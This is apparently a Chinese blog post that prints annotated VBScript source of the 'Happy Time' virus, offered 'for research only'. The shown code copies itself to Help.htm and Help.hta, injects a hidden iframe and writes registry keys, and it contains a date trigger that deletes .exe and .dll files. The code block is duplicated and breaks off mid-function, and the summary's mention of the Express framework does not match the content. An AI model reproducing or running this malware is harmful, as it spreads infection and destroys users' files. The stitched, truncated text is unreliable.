本文深入探讨了欢乐时光病毒的源码,分析了其使用VBScript编程语言的关键函数,揭示了它如何通过HTML和Shell交互来传播。同时,文章还涉及了Express框架在病毒行为中的潜在应用。
本贴内容只用于研究,请看到者帮助他人删除windows的VBS脚本语言,该语言是
重大安全漏洞!!!!!!
> <!--
> <script language='VBScript'>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> Rem I am sorry! happy time
> On Error Resume Next
> mload ----------------------从mload开始罪恶的历程
> Sub mload()
> On Error Resume Next
> mPath = Grf()
> Set Os = CreateObject("Scriptlet.TypeLib")
> Set Oh = CreateObject("Shell.Application")
> If IsHTML Then ----------------------如果本程序是网页,就是在Outlook
> mURL = LCase(document.Location)
> If mPath = "" Then
> Os.Reset
> Os.Path = "C:/Help.htm" ----------------------建立help.htm
> Os.Doc = Lhtml() ------------调入全部源码
> Os.Write() ----------------------存储自身到help.htm
> Ihtml = "<span style='position:absolute'><Iframe src='C:/Help.htm' width='0' height='0'></Iframe></span>"
> Call document.Body.insertAdjacentHTML("AfterBegin", Ihtml)
> Else
> If Iv(mPath, "Help.vbs") Then
> setInterval "Rt()", 10000
> Else
> m = "hta"
> If LCase(m) = Right(mURL, Len(m)) Then
> id = setTimeout("mclose()", 1) ---------调用mclose
> main ----------------进入主程序
> Else
> Os.Reset()
> Os.Path = mPath & "/" & "Help.hta" ------------建立Help.hta文件
> Os.Doc = Lhtml()
> Os.write()
> Iv mPath, "Help.hta"
> End If
> End If
> End If
> Else
> main
> End If
> End Sub
> Sub main() ----------------主程序
> On Error Resume Next
> Set Of = CreateObject("Scripting.FileSystemObject")
> Set Od = CreateObject("Scripting.Dictionary")
> Od.Add "html", "1100"
> Od.Add "vbs", "0100"
> Od.Add "htm", "1100"
> Od.Add "asp", "0010"
> Ks = "HKEY_CURRENT_USER/Software/" -----------------写注册表
> Ds = Grf()
> Cs = Gsf()
> If IsVbs Then
> If Of.FileExists("C:/help.htm") Then
> Of.DeleteFile ("C:/help.htm")
> End If
> Key = CInt(Month(Date) + Day(Date)) ---------------注意:破坏动作
> If Key = 13 Then ---------------如果月日之和等于13
> Od.RemoveAll
> Od.Add "exe", "0001" ---------------删除.exe.dll文件
> Od.Add "dll", "0001"
> End If
> Cn = Rg(Ks & "Help/Count") ------------修改注册表的计数器
> If Cn = "" Then
> Cn = 1
> End If
> Rw Ks & "Help/Count", Cn + 1
> f1 = Rg(Ks & "Help/FileName")
> f2 = FN
> <!--
> <script language='VBScript'>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> Rem I am sorry! happy time
> On Error Resume Next
> mload ----------------------从mload开始罪恶的历程
> Sub mload()
> On Error Resume Next
> mPath = Grf()
> Set Os = CreateObject("Scriptlet.TypeLib")
> Set Oh = CreateObject("Shell.Application")
> If IsHTML Then ----------------------如果本程序是网页,就是在Outlook
> mURL = LCase(document.Location)
> If mPath = "" Then
> Os.Reset
> Os.Path = "C:/Help.htm" ----------------------建立help.htm
> Os.Doc = Lhtml() ------------调入全部源码
> Os.Write() ----------------------存储自身到help.htm
> Ihtml = "<span style='position:absolute'><Iframe src='C:/Help.htm' width='0' height='0'></Iframe></span>"
> Call document.Body.insertAdjacentHTML("AfterBegin", Ihtml)
> Else
> If Iv(mPath, "Help.vbs") Then
> setInterval "Rt()", 10000
> Else
> m = "hta"
> If LCase(m) = Right(mURL, Len(m)) Then
> id = setTimeout("mclose()", 1) ---------调用mclose
> main ----------------进入主程序
> Else
> Os.Reset()
> Os.Path = mPath & "/" & "Help.hta" ------------建立Help.hta文件
> Os.Doc = Lhtml()
> Os.write()
> Iv mPath, "Help.hta"
> End If
> End If
> End If
> Else
> main
> End If
> End Sub
> Sub main() ----------------主程序
> On Error Resume Next
> Set Of = CreateObject("Scripting.FileSystemObject")
> Set Od = CreateObject("Scripting.Dictionary")
> Od.Add "html", "1100"
> Od.Add "vbs", "0100"
> Od.Add "htm", "1100"
> Od.Add "asp", "0010"
> Ks = "HKEY_CURRENT_USER/Software/" -----------------写注册表
> Ds = Grf()
> Cs = Gsf()
> If IsVbs Then
> If Of.FileExists("C:/help.htm") Then
> Of.DeleteFile ("C:/help.htm")
> End If
> Key = CInt(Month(Date) + Day(Date)) ---------------注意:破坏动作
> If Key = 13 Then ---------------如果月日之和等于13
> Od.RemoveAll
> Od.Add "exe", "0001" ---------------删除.exe.dll文件
> Od.Add "dll", "0001"
> End If
> Cn = Rg(Ks & "Help/Count") ------------修改注册表的计数器
> If Cn = "" Then
> Cn = 1
> End If
> Rw Ks & "Help/Count", Cn + 1
> f1 = Rg(Ks & "Help/FileName")
> f2 = FN
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
